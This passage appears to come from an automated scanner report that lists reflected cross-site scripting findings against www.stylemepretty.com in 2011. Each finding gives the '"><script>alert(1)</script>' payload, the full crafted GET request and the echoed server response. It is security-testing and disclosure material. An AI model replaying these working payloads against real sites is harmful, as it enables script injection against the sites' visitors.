com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com5400f\"><script>alert(1)</script>236704c7ee2/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 15 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3730c"><script>alert(1)</script>13578f7698c was submitted in the REST URL parameter 15. This input was echoed as 3730c\"><script>alert(1)</script>13578f7698c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com3730c"><script>alert(1)</script>13578f7698c/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
ghtygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com3730c\"><script>alert(1)</script>13578f7698c/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 16 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b458b"><script>alert(1)</script>08c1f5cd359 was submitted in the REST URL parameter 16. This input was echoed as b458b\"><script>alert(1)</script>08c1f5cd359 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.comb458b"><script>alert(1)</script>08c1f5cd359/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.comb458b\"><script>alert(1)</script>08c1f5cd359/preview.aspx|mtv.com/videos/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 17 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac779"><script>alert(1)</script>2bfd36a0c9f was submitted in the REST URL parameter 17. This input was echoed as ac779\"><script>alert(1)</script>2bfd36a0c9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.comac779"><script>alert(1)</script>2bfd36a0c9f/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:17:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:17:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
cks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.comac779\"><script>alert(1)</script>2bfd36a0c9f/videos/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 18 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8ed"><script>alert(1)</script>38869028b43 was submitted in the REST URL parameter 18. This input was echoed as bd8ed\"><script>alert(1)</script>38869028b43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videosbd8ed"><script>alert(1)</script>38869028b43/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:17:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:17:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videosbd8ed\"><script>alert(1)</script>38869028b43/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 19 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d71d1"><script>alert(1)</script>992b10ab617 was submitted in the REST URL parameter 19. This input was echoed as d71d1\"><script>alert(1)</script>992b10ab617 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.comd71d1"><script>alert(1)</script>992b10ab617/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:17:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:17:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.comd71d1\"><script>alert(1)</script>992b10ab617/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c88a"><script>alert(1)</script>89ec972f1a was submitted in the REST URL parameter 1. This input was echoed as 6c88a\"><script>alert(1)</script>89ec972f1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:6c88a"><script>alert(1)</script>89ec972f1a/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:15:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:15:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:6c88a\"><script>alert(1)</script>89ec972f1a/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b94b8"><script>alert(1)</script>4f68e9cd116 was submitted in the REST URL parameter 2. This input was echoed as b94b8\"><script>alert(1)</script>4f68e9cd116 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:b94b8"><script>alert(1)</script>4f68e9cd116/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:15:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:15:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:/stylehive.com|http:b94b8\"><script>alert(1)</script>4f68e9cd116/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc2a"><script>alert(1)</script>4594707726d was submitted in the REST URL parameter 3. This input was echoed as 8fc2a\"><script>alert(1)</script>4594707726d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:8fc2a"><script>alert(1)</script>4594707726d/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:15:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:8fc2a\"><script>alert(1)</script>4594707726d/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4054"><script>alert(1)</script>2b8b0a18f00 was submitted in the REST URL parameter 4. This input was echoed as d4054\"><script>alert(1)</script>2b8b0a18f00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.comd4054"><script>alert(1)</script>2b8b0a18f00/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:15:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:15:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.comd4054\"><script>alert(1)</script>2b8b0a18f00/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wond
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2caf6"><script>alert(1)</script>b34acd06046 was submitted in the REST URL parameter 5. This input was echoed as 2caf6\"><script>alert(1)</script>b34acd06046 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:2caf6"><script>alert(1)</script>b34acd06046/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:15:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:15:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:2caf6\"><script>alert(1)</script>b34acd06046/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65cd2"><script>alert(1)</script>a6a37c37bac was submitted in the REST URL parameter 6. This input was echoed as 65cd2\"><script>alert(1)</script>a6a37c37bac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com65cd2"><script>alert(1)</script>a6a37c37bac/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:15:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:15:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com65cd2\"><script>alert(1)</script>a6a37c37bac/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|p
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa98d"><script>alert(1)</script>1801b841c81 was submitted in the REST URL parameter 7. This input was echoed as aa98d\"><script>alert(1)</script>1801b841c81 in the application's response.

